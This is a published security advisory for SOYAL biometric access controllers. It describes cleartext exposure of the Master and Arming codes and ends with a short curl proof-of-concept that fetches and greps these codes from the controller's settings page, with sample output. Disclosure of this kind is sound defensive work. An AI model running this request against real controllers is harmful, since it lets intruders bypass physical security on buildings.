SOYAL Biometric Access Control System 5.0 Master Code Disclosure

`  
SOYAL Biometric Access Control System 5.0 Master Code Disclosure  
  
  
Vendor: SOYAL Technology Co., Ltd  
Product web page: https://www.soyal.com.tw | https://www.soyal.com  
Affected version: AR-727 i/CM - F/W: 5.0   
AR837E/EF - F/W: 4.3  
AR725Ev2 - F/W: 4.3 191231  
AR331/725E - F/W: 4.2  
AR837E/EF - F/W: 4.1  
AR-727CM /i - F/W: 4.09  
AR-727CM /i - F/W: 4.06  
AR-837E - F/W: 3.03  
  
Summary: Soyal Access systems are built into Raytel Door Entry Systems  
and are providing access and lift control to many buildings from public  
and private apartment blocks to prestigious public buildings.  
  
Desc: The controller suffers from a cleartext transmission of sensitive  
information. This allows interception of the HTTP traffic and disclose  
the Master code and the Arming code via a man-in-the-middle attack. An  
attacker can obtain these codes to enter into the controller's Programming  
mode and bypass physical security controls in place.  
  
Tested on: SOYAL Technology WebServer 2.0  
SOYAL Serial Device Server 4.03A   
SOYAL Serial Device Server 4.01n  
SOYAL Serial Device Server 3.07n  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5630  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php  
  
  
25.01.2021  
  
--  
  
  
$ curl 'http://192.168.1.1/CtrlParam.htm' \  
-H 'Authorization: Basic YWRtaW46' | \  
grep -ni -B1 'masterCode\|armCode'  
  
<td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>  
<td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>  
<td>Arming Code (4 Digital) </td>  
<td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>  
`